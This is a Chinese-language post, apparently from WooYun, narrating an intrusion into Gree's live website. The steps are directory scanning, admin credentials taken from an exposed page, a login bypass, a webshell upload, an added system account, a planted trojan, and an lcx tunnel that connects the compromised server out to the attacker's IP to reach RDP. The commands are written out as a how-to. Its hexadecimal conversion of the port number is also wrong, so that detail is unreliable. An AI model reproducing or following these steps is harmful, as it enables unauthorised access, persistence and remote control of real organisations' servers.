WooYun.org

今天在群里无意中看到有人说格力的官方网站是否能日。。
闲着没事就去看了下格力的网站 后来的结果自然是理想的 ☺
直接上神器 扫后台敏感目录先

直接爆出后台地址
http://www.gree.com/admin/config/main.jsp
http://www.gree.com/admin/config
后台地址两枚
又看到爆出敏感目录的后台帐号密码信息
http://www.gree.com/admin/db.jsp

用得到的帐号密码登录 http://www.gree.com/admin/config/main.jsp

接着打开http://www.gree.com/admin/main.jsp 需要帐密登录 但是没有获取到有效的登录帐密 然后得以UP大牛的方法提醒利用浏览器自身入侵的方法
首先打开用得到的帐号密码登录 http://www.gree.com/admin/config/main.jsp 用帐号密码登录 然后再打开http://www.gree.com/admin/main.jsp 到后台登录界面 因为此后台禁止鼠标右键 所以果断快捷键 Ctrl+F5 刷新后台 这时你会惊喜的发现 后台竟然进入了

此后又找到上传 果断传了个shell上去

看着有system权限，就直接添加了个账户netuser--icesword

加完账号，发现内网服务器啊，我靠，多麻烦。
不过tasklist看了下进程，发现也没杀软，干脆先种个马再说。
D:\~~~\> start C:\wmpub\ice.exe

话说我对端口转发还是比较恐惧的，我的2M宽带太蛋疼了。其实，我种马是为了更方便的端口转发。
接着，看看远程端口:
D:\~~~\> REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
端口号 -- > 0x19c8 == 6060 (0x1908是6060的十六进制数)

额，现在开始端口转发:
本机cmd:
#> C:\lcx.exe -listen 2222 3333
/*注释:2222 --转发端口; 3333--连接端口 */

肉鸡服务器cmd:
#> C:\wmpub\lcx.exe -slave 110.88.55.78 2222 127.0.0.1 6060
/*注释: 110.88.55.78是本机IP；6060是服务器远程桌面端口*/

两边的cmd命令行分别敲下Enter键，mstsc连接 127.0.0.1:3333。(可以观察到两边的窗口中，持续的在收发数据包)